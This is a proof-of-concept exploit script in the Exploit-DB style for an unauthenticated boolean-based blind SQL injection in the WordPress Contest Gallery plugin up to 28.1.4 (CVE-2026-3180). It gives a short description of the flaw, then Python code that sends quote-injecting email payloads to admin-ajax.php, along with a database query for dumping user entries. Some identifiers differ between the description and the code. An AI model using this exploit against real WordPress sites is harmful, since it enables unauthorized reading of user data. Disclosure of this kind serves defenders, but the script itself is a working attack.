# Exploit Title: WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
# Google Dork: N/A
# Date: 2026-06-02
# Exploit Author: cardosource
# Vendor Homepage: https://contest-gallery.com/
# Software Link: https://wordpress.org/plugins/contest-gallery/
# Version: <= 28.1.4
# Tested on: Docker - PHP 8.2/Apache + MariaDB (WordPress Environment)
# CVE: 2026-3180
"""
Description
A Blind SQL Injection vulnerability exists in Contest Gallery versions 28.1.4 and earlier. The issue is caused by the unsafe use of the cgl_maili parameter, where sanitize_email() preserves the single quote (') character in the local part of an email address. As a result, user-controlled input reaches wpdb->get_row() without proper parameterization via prepare(), allowing unauthenticated attackers to perform boolean-based blind SQL injection.
Authentication Required: No
"""
import requests
import json
NONCE = " "
URL = "http://localhost:8080/wp-admin/admin-ajax.php"
endpoint = "/wp-admin/admin-ajax.php"
url = "http://localhost:8080/"
payload = "'OR/**/1=1#@teste.com' and 'OR/**/1=2#@teste.com"
def send_payload(mail):
data = {
"action": "post_cg1l_resend_unconfirmed_mail_frontend",
"cgl_mail": mail,
"cgl_page_id": "1",
"cgl_activation_key": "",
"cg_nonce": NONCE,
}
return requests.post(URL, data=data)
r_true = send_payload("qualquer'OR/**/1=1#@teste.com")
if r_true.status_code == 200:
status_code = r_true.status_code
banner = f"""
CVE : 2026-3180 | Contest Gallery 28.1.4 : Boolean SQLi
payload :........................{payload}
end point :........................{endpoint}
url :..............................{url}
status :...........................{status_code}
nonce :............................{NONCE}
"""
print(banner)
print(f"Body length: {len(r_true.text)} chars")
poc =f'''\nmariadb wordpress_db -e "
SELECT * FROM wp_contest_gal1ery_create_user_entries
ORDER BY Tstamp DESC LIMIT 1115;"'''
print(poc)
